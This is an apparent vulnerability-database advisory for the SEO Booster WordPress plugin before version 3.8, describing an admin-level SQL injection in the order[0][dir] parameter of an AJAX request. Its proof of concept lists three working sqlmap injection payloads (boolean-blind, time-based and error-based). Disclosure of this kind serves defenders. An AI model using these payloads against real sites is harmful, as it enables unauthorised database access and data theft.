WordPress Plugin Vulnerabilities
SEO Booster < 3.8 - Admin+ SQL Injection
Description
The plugin allows for authenticated SQL injection via the "fn_my_ajaxified_dataloader_ajax" AJAX request as the $_REQUEST['order'][0]['dir'] parameter is not properly escaped leading to blind and error-based SQL injections.
Proof of Concept
Install SEO Booster, then click on the "Incoming Keywords" link in the Wordpress administrative interface. An ajax request called "fn_my_ajaxified_dataloader_ajax" will be generated and sent. Intercept it and modify order[0][dir] parameter to achieve different types of SQL injections. Sqlmap vectors: 1. Type: boolean-based blind order[0][dir]=desc,(SELECT (CASE WHEN (1081=1081) THEN 1 ELSE 1081*(SELECT 1081 FROM INFORMATION_SCHEMA.PLUGINS) END)) 2. Type: time-based blind order[0][dir]=desc PROCEDURE ANALYSE(EXTRACTVALUE(8553,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x4b686547))))),1)# 3. Type: error-based order[0][dir]=desc,(SELECT 9426 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (ELT(9426=9426,1))),0x71767a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
bl4derunner
Submitter
Anton Sarsadskikh
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-11-15 (about 2 years ago)
Added
2021-11-15 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)